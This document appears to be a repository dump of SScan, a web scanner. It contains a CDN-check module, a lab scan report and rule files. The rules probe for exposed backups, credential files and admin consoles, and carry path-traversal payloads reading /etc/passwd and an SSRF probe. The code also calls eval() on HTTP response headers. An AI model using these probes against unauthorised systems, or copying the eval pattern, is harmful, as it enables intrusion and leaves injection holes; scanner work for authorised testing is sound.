83 | if not url.startswith("http://") and not url.startswith("https://"):
84 | url = "http://" + url
85 | response = requests.get(url, headers=setting.default_headers, timeout=10, verify=False)
86 | headers = str(response.headers).lower()
87 | except Exception as e:
88 | logger.log('DEBUG', f'url: {url} {repr(e)}')
89 | headers = None
90 | return headers
91 |
92 |
93 | def get_ip_list(url):
94 | if url.find('://') < 0:
95 | netloc = url[:url.find('/')] if url.find('/') > 0 else url
96 | else:
97 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
98 | ip_list = []
99 | try:
100 | addrs = socket.getaddrinfo(netloc, None)
101 | for item in addrs:
102 | if item[4][0] not in ip_list:
103 | ip_list.append(item[4][0])
104 | except Exception as e:
105 | logger.log('DEBUG', f'url: {url} {netloc} {repr(e)}')
106 | pass
107 | return ip_list
108 |
109 |
110 | def check_cdn_cidr(ips):
111 | for ip in ips:
112 | try:
113 | ip = ipaddress.ip_address(ip)
114 | except Exception as e:
115 | logger.log('DEBUG', e.args)
116 | return False
117 | for cidr in cdn_ip_cidr:
118 | if ip in ipaddress.ip_network(cidr):
119 | return True
120 |
121 |
122 | def check_cname_keyword(cname):
123 | for name in cname:
124 | for keyword in cdn_cname_keyword.keys():
125 | if keyword in name.lower():
126 | return True
127 |
128 |
129 | def check_header_key(headers):
130 | for key in cdn_header_key:
131 | if key in headers:
132 | return True
133 |
134 |
135 | def check_cdn_asn(ip):
136 | try:
137 | # https://www.maxmind.com/en/accounts/410249/geoip/downloads
138 | with geoip2.database.Reader(setting.data_storage_dir.joinpath('GeoLite2-ASN.mmdb')) as reader:
139 | for i in ip:
140 | response = reader.asn(i)
141 | asn = response.autonomous_system_number
142 | if str(asn) in cdn_asn_list:
143 | return True
144 | except Exception as e:
145 | pass
146 | return False
147 |
148 |
149 | # data = [{'cname' : cnames, 'headers' : headers, 'ip' : ip_list, 'url' : 'https://www.baidu.com'}]
150 | def run(url, task):
151 | progress.start_task(task)
152 | flag = False
153 | ip = get_ip_list(url)
154 | data = [{'cname': get_cnames([], url), 'headers': get_headers(url), 'ip': ip}]
155 | for index, item in enumerate(data):
156 | cname = item.get('cname')
157 | if cname:
158 | if check_cname_keyword(cname):
159 | flag = True
160 | try:
161 | headers = item.get('headers')
162 | if headers:
163 | headers = eval(headers).keys()
164 | if check_header_key(headers):
165 | flag = True
166 | except Exception as e:
167 | logger.log('FATAL', f'{url} {repr(e)}')
168 | pass
169 |
170 | ip = item.get('ip')
171 | if check_cdn_cidr(ip) or check_cdn_asn(ip):
172 | flag = True
173 |
174 | progress.update(task, advance=1)
175 | if flag:
176 | logger.log("DEBUG", f' {url} 存在CDN ')
177 | return ''
178 | else:
179 | return ip
180 |
181 |
182 | def check_cdn(processed_targets):
183 | ips = []
184 | # 创建一个事件循环
185 | loop = asyncio.new_event_loop()
186 | asyncio.set_event_loop(loop)
187 | # 创建一个线程池,开启6个线程
188 | p = ThreadPoolExecutor(6)
189 | # 这一步很重要, 使用线程池访问,使用loop.run_in_executor()函数:内部接受的是阻塞的线程池,执行的函数,传入的参数
190 | tasks = []
191 |
192 | # 进度条
193 | with progress:
194 | task = progress.add_task(f"[cyan]CDN check module ...", total=len(processed_targets), start=False)
195 |
196 | for target in processed_targets:
197 | target = target.replace('\n', '').replace('\r', '').strip()
198 | # 只对域名做CDN 检测,排除目标中的ip
199 | if re.match(r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$", target):
200 | ips.append(target)
201 | progress.update(task, advance=1)
202 | else:
203 | tasks.append(loop.run_in_executor(p, run, target, task))
204 |
205 | if len(tasks) > 0:
206 | # 使用uvloop加速asyncio, 目前不支持Windows
207 | import platform
208 | if platform.system() != "Windows":
209 | import uvloop
210 | asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
211 |
212 | # 等待所有的任务完成
213 | result = asyncio.wait(tasks)
214 | loop.run_until_complete(result)
215 | for i in tasks:
216 | ips.extend(i.result())
217 | loop.close()
218 |
219 | return ips
220 |
221 |
--------------------------------------------------------------------------------
/logs/sscan.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/logs/sscan.log
--------------------------------------------------------------------------------
/report/_20210106_153943.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | BBScan 1.5 Scan Report
5 |
6 |
18 |
19 |
20 | Scanned 1 targets in
21 | 5 min 21.48 seconds .
22 | 1 vulnerable hosts found in total.
23 |
24 | https://ac2f1f241e07ad04807307cc002b0066.web-security-academy.net
25 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | fire
2 | beautifulsoup4
3 | rich
4 | pymongo
5 | pymysql
6 | psycopg2-binary
7 | uvloop; platform_system != "Windows"
8 | requests
9 | geoip2
10 | retrying
11 | yarl
12 | loguru
13 | dnspython
14 |
--------------------------------------------------------------------------------
/rules/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/rules/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/rules/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/rules/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/rules/.idea/rules.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/rules/apache.txt:
--------------------------------------------------------------------------------
1 | # Apache
2 | /.htaccess {status=200} {tag="htaccess"} {root_only}
3 | /.htpasswd {status=200} {tag="htpasswd"} {root_only}
4 | /.meta {status=200} {tag="meta"} {root_only}
5 | /.web {status=200} {tag="web"} {root_only}
6 | /access_log {status=200} {tag="access_log"} {root_only}
7 | /cgi {status=200} {tag="cgi"} {root_only}
8 | /cgi-bin {status=200} {tag="cgi-bin "} {root_only}
9 | /cgi-pub {status=200} {tag="cgi-pub"} {root_only}
10 | /cgi-script {status=200} {tag="cgi-script"} {root_only}
11 | /dummy {status=200} {tag="dummy"} {root_only}
12 | /error {status=200} {tag="error"} {root_only}
13 | /error_log {status=200} {tag="error_log"} {root_only}
14 | /htdocs {status=200} {tag="htdocs"} {root_only}
15 | /httpd {status=200} {tag="httpd"} {root_only}
16 | /httpd.pid {status=200} {tag="httpd.pid "} {root_only}
17 | /logs {status=200} {tag="logs"} {root_only}
18 | /manual {status=200} {tag="manual"} {root_only}
19 | /phf {status=200} {tag="phf"} {root_only}
20 | /printenv {status=200} {tag="printenv"} {root_only}
21 | /server-info {status=200} {tag="server-info"} {root_only}
22 | /server-status {status=200} {tag="server-status "} {root_only}
23 | /status {status=200} {tag="status"} {root_only}
24 | /test-cgi {status=200} {tag="test-cgi"} {root_only}
25 | /tmp {status=200} {tag="tmp"} {root_only}
26 | /~bin {status=200} {tag="~bin"} {root_only}
27 | /~ftp {status=200} {tag="~ftp"} {root_only}
28 | /~nobody {status=200} {tag="~nobody "} {root_only}
29 | /~root {status=200} {tag="~root"} {root_only}
--------------------------------------------------------------------------------
/rules/black.list:
--------------------------------------------------------------------------------
1 | # text to exclude in html doc
2 | # regex can be used
3 | # 匹配的条目将被丢弃
4 | # {text="403 Forbidden "}
5 | # {text="You don't have permission to access this page"}
6 |
7 | # {text="/404/search_children.js"}
8 |
9 | {text="qzone.qq.com/gy/404/data.js"}
10 |
11 | {regex_text=".*页面不存在.*"}
12 |
13 | {regex_text=".*404.* "}
14 |
15 | {regex_text=".*页面没有找到.*"}
16 |
17 | {regex_text=".*页面不见.*"}
18 |
19 | {text="由于安全原因JSP功能默认关闭"}
20 |
21 | {text="404 Not Found"}
22 |
23 | {text="The server encountered an internal error or"}
24 |
25 | {text="Sorry, you are not permitted to view this page."}
26 |
27 | {text="http://www.qq.com/babygohome/?pgv_ref=404"}
28 |
29 | {text="
410 Gone "}
30 |
31 | {regex_text="controller.*not found"}
32 |
33 | {text="404 Page Not Found "}
34 |
35 | {text="Moved Permanently"}
36 |
37 | # {text="You do not have permission to get URL"}
38 |
39 | {text="Whoops, looks like something went wrong. "}
40 |
41 | {text="invalid service url:"}
42 |
43 | {text="当前页面不存在或已删除"}
44 |
45 | # {text="No direct script access allowed"}
46 |
47 | {text="HTTP Status 404 – Not Found "}
48 |
49 | {text="Controller Not Found"}
50 |
51 | {text="url error"}
52 |
53 | {text="Bad Request"}
54 |
55 | {text="http://appmedia.qq.com/media/flcdn/404.png"}
56 |
--------------------------------------------------------------------------------
/rules/change_log.txt:
--------------------------------------------------------------------------------
1 | # Chang Log
2 | /readme {status=200} {type_no="html"} {root_only}
3 | /README {status=200} {type_no="html"} {root_only}
4 | /readme.md {status=200} {type_no="html"} {root_only}
5 | /readme.html {status=200} {type="html"} {root_only}
6 | /changelog.txt {status=200} {type="text/plain"} {root_only}
--------------------------------------------------------------------------------
/rules/common_app.txt:
--------------------------------------------------------------------------------
1 | /ks/install {status=200} {type_no="html"}
--------------------------------------------------------------------------------
/rules/compressed_backup_files.txt:
--------------------------------------------------------------------------------
1 |
2 | /temp.zip {status=206} {type="application/"} {root_only}
3 | /temp.rar {status=206} {type="application/"} {root_only}
4 | /temp.tar.gz {status=206} {type="application/"} {root_only}
5 | /temp.tgz {status=206} {type="application/"} {root_only}
6 | /temp.tar.bz2 {status=206} {type="application/"} {root_only}
7 |
8 |
9 | /tmp.zip {status=206} {type="application/"} {root_only}
10 | /tmp.rar {status=206} {type="application/"} {root_only}
11 | /tmp.tar.gz {status=206} {type="application/"} {root_only}
12 | /tmp.tgz {status=206} {type="application/"} {root_only}
13 | /tmp.tar.bz2 {status=206} {type="application/"} {root_only}
14 |
15 |
16 | /package.zip {status=206} {type="application/"} {root_only}
17 | /package.rar {status=206} {type="application/"} {root_only}
18 | /package.tar.gz {status=206} {type="application/"} {root_only}
19 | /package.tgz {status=206} {type="application/"} {root_only}
20 | /package.tar.bz2 {status=206} {type="application/"} {root_only}
21 |
22 |
23 | /test.zip {status=206} {type="application/"} {root_only}
24 | /test.rar {status=206} {type="application/"} {root_only}
25 | /test.tar.gz {status=206} {type="application/"} {root_only}
26 | /test.tgz {status=206} {type="application/"} {root_only}
27 | /test.tar.bz2 {status=206} {type="application/"} {root_only}
28 |
29 |
30 | /backup.zip {status=206} {type="application/"} {root_only}
31 | /backup.rar {status=206} {type="application/"} {root_only}
32 | /backup.tar.gz {status=206} {type="application/"} {root_only}
33 | /backup.tgz {status=206} {type="application/"} {root_only}
34 | /back.tar.bz2 {status=206} {type="application/"} {root_only}
35 |
36 |
37 | /db.zip {status=206} {type="application/"} {root_only}
38 | /db.rar {status=206} {type="application/"} {root_only}
39 | /db.tar.gz {status=206} {type="application/"} {root_only}
40 | /db.tgz {status=206} {type="application/"} {root_only}
41 | /db.tar.bz2 {status=206} {type="application/"} {root_only}
42 | /db.inc {status=200} {type_no="html"}
43 | /db.sqlite {status=206} {type="application/"} {root_only}
44 |
45 |
46 | /db.sql.gz {status=206} {type="application/"} {root_only}
47 | /dump.sql.gz {status=206} {type="application/"} {root_only}
48 | /database.sql.gz {status=206} {type="application/"} {root_only}
49 | /backup.sql.gz {status=206} {type="application/"} {root_only}
50 | /data.sql.gz {status=206} {type="application/"} {root_only}
51 |
52 |
53 | /data.zip {status=206} {type="application/"} {root_only}
54 | /data.rar {status=206} {type="application/"} {root_only}
55 | /data.tar.gz {status=206} {type="application/"} {root_only}
56 | /data.tgz {status=206} {type="application/"} {root_only}
57 | /data.tar.bz2 {status=206} {type="application/"} {root_only}
58 |
59 |
60 | /database.zip {status=206} {type="application/"} {root_only}
61 | /database.rar {status=206} {type="application/"} {root_only}
62 | /database.tar.gz {status=206} {type="application/"} {root_only}
63 | /database.tgz {status=206} {type="application/"} {root_only}
64 | /database.tar.bz2 {status=206} {type="application/"} {root_only}
65 |
66 |
67 | /ftp.zip {status=206} {type="application/"} {root_only}
68 | /ftp.rar {status=206} {type="application/"} {root_only}
69 | /ftp.tar.gz {status=206} {type="application/"} {root_only}
70 | /ftp.tgz {status=206} {type="application/"} {root_only}
71 | /ftp.tar.bz2 {status=206} {type="application/"} {root_only}
72 |
73 | /web.zip {status=206} {type="application/"} {root_only}
74 | /web.rar {status=206} {type="application/"} {root_only}
75 | /web.tar.gz {status=206} {type="application/"} {root_only}
76 | /web.tgz {status=206} {type="application/"} {root_only}
77 | /web.tar.bz2 {status=206} {type="application/"} {root_only}
78 |
79 |
80 | /www.zip {status=206} {type="application/"} {root_only}
81 | /www.rar {status=206} {type="application/"} {root_only}
82 | /www.tar.gz {status=206} {type="application/"} {root_only}
83 | /www.tgz {status=206} {type="application/"} {root_only}
84 | /www.tar.bz2 {status=206} {type="application/"} {root_only}
85 |
86 | /wwwroot.zip {status=206} {type="application/"} {root_only}
87 | /wwwroot.rar {status=206} {type="application/"} {root_only}
88 | /wwwroot.tar.gz {status=206} {type="application/"} {root_only}
89 | /wwwroot.tgz {status=206} {type="application/"} {root_only}
90 | /wwwroot.tar.bz2 {status=206} {type="application/"} {root_only}
91 |
92 |
93 | /output.tar.gz {status=206} {type="application/"} {root_only}
94 |
95 |
96 | /admin.zip {status=206} {type="application/"} {root_only}
97 | /admin.rar {status=206} {type="application/"} {root_only}
98 | /admin.tar.gz {status=206} {type="application/"} {root_only}
99 | /admin.tgz {status=206} {type="application/"} {root_only}
100 | /admin.tar.bz2 {status=206} {type="application/"} {root_only}
101 |
102 | /upload.zip {status=206} {type="application/"} {root_only}
103 | /upload.rar {status=206} {type="application/"} {root_only}
104 | /upload.tar.gz {status=206} {type="application/"} {root_only}
105 | /upload.tgz {status=206} {type="application/"} {root_only}
106 | /upload.tar.bz2 {status=206} {type="application/"} {root_only}
107 |
108 | /website.zip {status=206} {type="application/"} {root_only}
109 | /website.rar {status=206} {type="application/"} {root_only}
110 | /website.tar.gz {status=206} {type="application/"} {root_only}
111 | /website.tgz {status=206} {type="application/"} {root_only}
112 | /website.tar.bz2 {status=206} {type="application/"} {root_only}
113 |
114 | /sql.zip {status=206} {type="application/"} {root_only}
115 | /sql.rar {status=206} {type="application/"} {root_only}
116 | /sql.tar.gz {status=206} {type="application/"} {root_only}
117 | /sql.tgz {status=206} {type="application/"} {root_only}
118 | /sql.tar.bz2 {status=206} {type="application/"} {root_only}
119 | /sql.7z {status=206} {type="application/"} {root_only}
120 |
121 | /data.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
122 | /database.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
123 | /db.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
124 | /test.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
125 | /admin.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
126 | /backup.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
127 | /dump.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
128 | /{sub}.sql {status=206} {type="application/"} {tag="CREATE TABLE"} {root_only}
129 |
130 | /index.zip {status=206} {type="application/"} {root_only}
131 | /index.7z {status=206} {type="application/"} {root_only}
132 | /index.bak {status=206} {type="application/"} {root_only}
133 | /index.rar {status=206} {type="application/"} {root_only}
134 | /index.tar.tz {status=206} {type="application/"} {root_only}
135 | /index.tar.bz2 {status=206} {type="application/"} {root_only}
136 | /index.tar.gz {status=206} {type="application/"} {root_only}
137 |
138 | /old.zip {status=206} {type="application/"} {root_only}
139 | /old.rar {status=206} {type="application/"} {root_only}
140 | /old.tar.gz {status=206} {type="application/"} {root_only}
141 | /old.tar.bz2 {status=206} {type="application/"} {root_only}
142 | /old.tgz {status=206} {type="application/"} {root_only}
143 | /old.7z {status=206} {type="application/"} {root_only}
144 |
145 | /1.tar.gz {status=206} {type="application/"} {root_only}
146 | /a.tar.gz {status=206} {type="application/"} {root_only}
147 |
148 | /conf/conf.zip {status=206} {type="application/"} {root_only}
149 | /conf.tar.gz {status=206} {type="application/"} {root_only}
150 | /config.tar.gz {status=206} {type="application/"} {root_only}
151 |
152 | /proxy.pac {status=206} {type="application/"} {root_only}
153 | /server.cfg {status=206} {type="application/"} {root_only}
154 |
155 | /deploy.tar.gz {status=206} {type="application/"} {root_only}
156 | /build.tar.gz {status=206} {type="application/"} {root_only}
157 | /install.tar.gz {status=206} {type="application/"} {root_only}
158 | /site.tar.gz {status=206} {type="application/"} {root_only}
159 | /webroot.zip {status=206} {type="application/"} {root_only}
160 | /tools.tar.gz {status=206} {type="application/"} {root_only}
161 | /webserver.tar.gz {status=206} {type="application/"} {root_only}
162 | /htdocs.tar.gz {status=206} {type="application/"} {root_only}
163 | /src.tar.gz {status=206} {type="application/"} {root_only}
164 | /code.tar.gz {status=206} {type="application/"} {root_only}
165 |
--------------------------------------------------------------------------------
/rules/config_file.txt:
--------------------------------------------------------------------------------
1 | # Config
2 | /config.inc {status=200} {type_no="html"} {root_only}
3 | /config.php.bak {status=206} {type="application/octet-stream"} {tag="Index of"}
2 |
3 | # wordpress备份目录
4 | /wp-content/uploads/database-backups/ {status=200} {tag="Index of"}
5 | /wp-content/uploads/backup-database/ {status=200} {tag="Index of"}
6 |
--------------------------------------------------------------------------------
/rules/directory_traversal.txt:
--------------------------------------------------------------------------------
1 | # Directory traversal
2 |
3 | /etc/passwd {tag="root:x:"}
4 | /etc/shells {tag="/bin/bash"}
5 | /proc/meminfo {tag="MemTotal"} {status=200} {root_only}
6 | /etc/profile {tag="/etc/profile.d/*.sh"} {status=200} {root_only}
7 | /file:///etc/passwd {tag="root:x:"} {root_only}
8 |
9 | /../../../../../../../../../../../../../etc/shells {tag="/bin/bash"} {root_only}
10 | /../../../../../../../../../../../../../etc/profile {tag="/etc/profile.d/*.sh"} {root_only}
11 | //././././././././././././././././././././././././../../../../../../../../etc/profile {tag="/etc/profile.d/*.sh"} {root_only}
12 | /aa/../../cc/../../bb/../../dd/../../aa/../../cc/../../bb/../../dd/../../bb/../../dd/../../bb/../../dd/../../bb/../../dd/../../ee/../../etc/shells {status=200} {tag="/bin/bash"} {root_only}
13 |
14 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells {tag="/bin/bash"}
15 | /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshells {tag="/bin/bash"} {root_only}
16 | /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fshells {tag="/bin/bash"} {root_only}
17 | /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshells {tag="/bin/bash"} {root_only}
18 |
19 | /resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd {tag="root:x:"} {root_only}
--------------------------------------------------------------------------------
/rules/disabled/.gitignore:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/rules/disabled/.gitignore
--------------------------------------------------------------------------------
/rules/druid.txt:
--------------------------------------------------------------------------------
1 | # Druid
2 | /druid/websession.html {status=200} {type="html"} {tag="Druid未授权"} {root_only}
3 | /system/druid/websession.html {status=200} {type="html"} {tag="Druid未授权"} {root_only}
4 | /webpage/system/druid/websession.html(jeecg) {status=200} {type="html"} {tag="Druid未授权"} {root_only}
5 |
6 | /druid/login.html {status=200} {type="html"} {tag="Druid登录"} {root_only}
7 | /system/druid/login.html {status=200} {type="html"} {tag="Druid登录"} {root_only}
8 | /webpage/system/druid/login.html {status=200} {type="html"} {tag="Druid登录"} {root_only}
--------------------------------------------------------------------------------
/rules/git_and_svn.txt:
--------------------------------------------------------------------------------
1 | # SVN and Git
2 | /.svn/entries {status=200} {tag="-props"}
3 | /.git/config {status=200} {tag="[core]"} {root_only}
4 | /.git/index {status=200} {tag="DIRC"} {root_only}
5 | /.git/HEAD {status=200} {tag="refs/heads/"} {root_only}
--------------------------------------------------------------------------------
/rules/graphite_ssrf.txt:
--------------------------------------------------------------------------------
1 | /composer/send_email?to=orangetest@nogg&url=http://ww.cctvasdfasfsaasfasfs.com {status=200} {tag="gaierror: [Errno -2]"} {root_only}
--------------------------------------------------------------------------------
/rules/iis.txt:
--------------------------------------------------------------------------------
1 | /Micros~1 {status=200} {tag="IIS"} {root_only}
2 | /WebSer~1 {status=200} {tag="IIS"} {root_only}
3 | /_mem_bin {status=200} {tag="IIS"} {root_only}
4 | /_private {status=200} {tag="IIS"} {root_only}
5 | /_vti_adm {status=200} {tag="IIS"} {root_only}
6 | /_vti_aut {status=200} {tag="IIS"} {root_only}
7 | /_vti_bin {status=200} {tag="IIS"} {root_only}
8 | /_vti_cnf {status=200} {tag="IIS"} {root_only}
9 | /_vti_log {status=200} {tag="IIS"} {root_only}
10 | /_vti_pvt {status=200} {tag="IIS"} {root_only}
11 | /_vti_script {status=200} {tag="IIS"} {root_only}
12 | /_vti_txt {status=200} {tag="IIS"} {root_only}
13 | /administration {status=200} {tag="IIS"} {root_only}
14 | /adsamples {status=200} {tag="IIS"} {root_only}
15 | /archiv~1 {status=200} {tag="IIS"} {root_only}
16 | /aspnet_client {status=200} {tag="IIS"} {root_only}
17 | /asps {status=200} {tag="IIS"} {root_only}
18 | /bin {status=200} {tag="IIS"} {root_only}
19 | /bins {status=200} {tag="IIS"} {root_only}
20 | /cgi-bin {status=200} {tag="IIS"} {root_only}
21 | /cmsample {status=200} {tag="IIS"} {root_only}
22 | /common~1 {status=200} {tag="IIS"} {root_only}
23 | /db {status=200} {tag="IIS"} {root_only}
24 | /fpsample {status=200} {tag="IIS"} {root_only}
25 | /iisadmin {status=200} {tag="IIS"} {root_only}
26 | /iisadmpwd {status=200} {tag="IIS"} {root_only}
27 | /iishelp {status=200} {tag="IIS"} {root_only}
28 | /iissamples {status=200} {tag="IIS"} {root_only}
29 | /inetpub {status=200} {tag="IIS"} {root_only}
30 | /inetsrv {status=200} {tag="IIS"} {root_only}
31 | /isapi {status=200} {tag="IIS"} {root_only}
32 | /msadc {status=200} {tag="IIS"} {root_only}
33 | /pbserver {status=200} {tag="IIS"} {root_only}
34 | /printers {status=200} {tag="IIS"} {root_only}
35 | /progra~1 {status=200} {tag="IIS"} {root_only}
36 | /samples {status=200} {tag="IIS"} {root_only}
37 | /scripts {status=200} {tag="IIS"} {root_only}
38 | /scripts/samples {status=200} {tag="IIS"} {root_only}
39 | /scripts/tools {status=200} {tag="IIS"} {root_only}
40 | /sites {status=200} {tag="IIS"} {root_only}
41 | /siteserver {status=200} {tag="IIS"} {root_only}
42 | /system {status=200} {tag="IIS"} {root_only}
43 | /system_web {status=200} {tag="IIS"} {root_only}
44 | /web {status=200} {tag="IIS"} {root_only}
45 | /webpub {status=200} {tag="IIS"} {root_only}
46 | /winnt {status=200} {tag="IIS"} {root_only}
47 | /wwwroot {status=200} {tag="IIS"} {root_only}
48 | /x.cfm {status=200} {tag="IIS"} {root_only}
49 | /x.htx {status=200} {tag="IIS"} {root_only}
50 | /x.ida {status=200} {tag="IIS"} {root_only}
51 | /x.idc {status=200} {tag="IIS"} {root_only}
52 | /x.idq {status=200} {tag="IIS"} {root_only}
53 | /x.pl {status=200} {tag="IIS"} {root_only}
54 | /x.shtml {status=200} {tag="IIS"} {root_only}
55 |
--------------------------------------------------------------------------------
/rules/java_server_faces2.txt:
--------------------------------------------------------------------------------
1 | /javax.faces.resource.../WEB-INF/web.xml.jsf {status=200} {type="xml"} {tag="APC INFO"} {root_only}
9 |
--------------------------------------------------------------------------------
/rules/phpmyadmin.txt:
--------------------------------------------------------------------------------
1 |
2 | /phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
3 | /phpMyAdmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
4 | /_phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
5 | /pma/index.php {tag="phpMyAdmin"} {status=200} {root_only}
6 |
--------------------------------------------------------------------------------
/rules/possible_flash_xss.txt:
--------------------------------------------------------------------------------
1 | /ZeroClipboard.swf {status=206} {type="flash"}
2 | /zeroclipboard.swf {status=206} {type="flash"}
3 | /swfupload.swf {status=206} {type="flash"}
4 | /swfupload/swfupload.swf {status=206} {type="flash"}
5 | /open-flash-chart.swf {status=206} {type="flash"}
6 | /uploadify.swf {status=206} {type="flash"}
7 | /flowplayer.swf {status=206} {type="flash"}
8 | /Jplayer.swf {status=206} {type="flash"}
9 | /extjs/resources/charts.swf {status=206} {type="flash"}
--------------------------------------------------------------------------------
/rules/python_web.txt:
--------------------------------------------------------------------------------
1 | #django dev mode
2 | /42ea856c85e05b2a910c08df2e3d04d4 {tag="Django settings file"}
--------------------------------------------------------------------------------
/rules/resin_admin.txt:
--------------------------------------------------------------------------------
1 | # Resin Doc
2 | /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile {tag="/etc/profile.d/*.sh"} {root_only}
3 | /resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp {tag="This is the default start page for the Resin server"} {root_only}
4 | /resin-admin/ {status=200} {tag="Resin Admin Login for"} {root_only}
5 |
--------------------------------------------------------------------------------
/rules/safetyEquipment.txt:
--------------------------------------------------------------------------------
1 | # 安全设备
2 | /fort/pages/login.jsp {tag="网神SecFox安全审计系统"} {status=200} {root_only}
--------------------------------------------------------------------------------
/rules/sensitive_url.txt:
--------------------------------------------------------------------------------
1 | # each item must starts with right slash "/"
2 | # format:
3 | /path {tag="text string to find"} {status=STATUS_CODE} {type="content-type must have this string"} {type_no="content-type must not have this string"}
4 | # {root_only} set scan web root only
5 |
6 | /core {status=200} {tag="ELF"} {root_only}
7 | /debug.txt {status=200} {type="text/plain"} {root_only}
8 | /.bash_history {status=206} {type_no="html"} {root_only}
9 | /.rediscli_history {status=206} {type_no="html"} {root_only}
10 | /.bashrc {status=206} {type_no="html"} {root_only}
11 | /.bash_profile {status=206} {type_no="html"} {root_only}
12 | /.bash_logout {status=206} {type_no="html"} {root_only}
13 | /.vimrc {status=206} {type_no="html"} {root_only}
14 | /.DS_Store {status=206} {type_no="html"}
15 | /.history {status=206} {type_no="html"} {root_only}
16 | /.htpasswd {status=206} {type_no="html"} {root_only}
17 | /.htpasswd.bak {status=206} {type_no="html"} {root_only}
18 | /htpasswd.bak {status=206} {type_no="html"} {root_only}
19 | /nohup.out {status=206} {type_no="html"} {root_only}
20 | /.mysql_history {status=206} {type_no="html"} {root_only}
21 | /httpd.conf {status=200} {type_no="html"} {root_only}
22 |
23 |
24 | /server-status {tag="Apache Status "} {root_only}
25 | /solr/ {tag="Solr Admin "} {status=200} {type="html"} {root_only}
26 |
27 |
28 | # /nagios/
29 | # /kibana/
30 | /jmx-console/HtmlAdaptor {status=200} {tag="JBoss Management Console"} {root_only}
31 | /cacti/ {tag="Login to Cacti "} {root_only}
32 | /zabbix/ {tag="Zabbix "} {root_only}
33 |
34 | # jenkins
35 | /jenkins/static/f3a41d2f/css/style.css {type="text/css"} {status=200} {tag="jenkins-home-link"} {root_only}
36 | /static/f3a41d2f/css/style.css {type="text/css"} {status=200} {tag="jenkins-home-link"} {root_only}
37 | /script {status=200} {tag="Type in an arbitrary"} {root_only}
38 | /jenkins/script {status=200} {tag="Type in an arbitrary"} {root_only}
39 | /exit {status=200} {tag="POST required "} {root_only}
40 |
41 | /memadmin/index.php {tag="Login - MemAdmin"} {root_only}
42 | /ganglia/ {tag="Ganglia"} {root_only}
43 |
44 | /data.txt {status=200} {type="text/plain"} {root_only}
45 | /install.txt {status=200} {type="text/plain"} {root_only}
46 | /INSTALL.TXT {status=200} {type="text/plain"} {root_only}
47 |
48 | /a.out {status=200} {type_no="html"} {root_only}
49 | /key {status=200} {type_no="html"} {root_only}
50 | /keys {status=200} {type_no="html"} {root_only}
51 | /key.txt {status=200} {type="text/plain"} {root_only}
52 | /temp.txt {status=200} {type="text/plain"}
53 | /tmp.txt {status=200} {type="text/plain"}
54 |
55 | /php.ini {status=200} {type_no="html"} {tag="["}
56 |
--------------------------------------------------------------------------------
/rules/shell_scripts.txt:
--------------------------------------------------------------------------------
1 |
2 | /install.sh {status=206} {root_only} {tag='#!/'}
3 | /deploy.sh {status=206} {root_only} {tag='#!/'}
4 | /upload.sh {status=206} {root_only} {tag='#!/'}
5 | /setup.sh {status=206} {root_only} {tag='#!/'}
6 | /backup.sh {status=206} {root_only} {tag='#!/'}
7 | /rsync.sh {status=206} {root_only} {tag='#!/'}
8 | /sync.sh {status=206} {root_only} {tag='#!/'}
9 | /test.sh {status=206} {root_only} {tag='#!/'}
10 | /run.sh {status=206} {root_only} {tag='#!/'}
11 | /start.sh {status=206} {root_only} {tag='#!/'}
12 | /stop.sh {status=206} {root_only} {tag='#!/'}
13 | /build.sh {status=206} {root_only} {tag='#!/'}
--------------------------------------------------------------------------------
/rules/source_code_disclosure.txt:
--------------------------------------------------------------------------------
1 |
2 | /index.php.bak {status=206} {type="application/"} {tag="Apache Tomcat Examples "} {root_only}
3 | /examples/servlets/servlet/SessionExample {status=200} {type="html"} {tag="Sessions Example "} {root_only}
4 | /manager/html {status=401} {root_only}
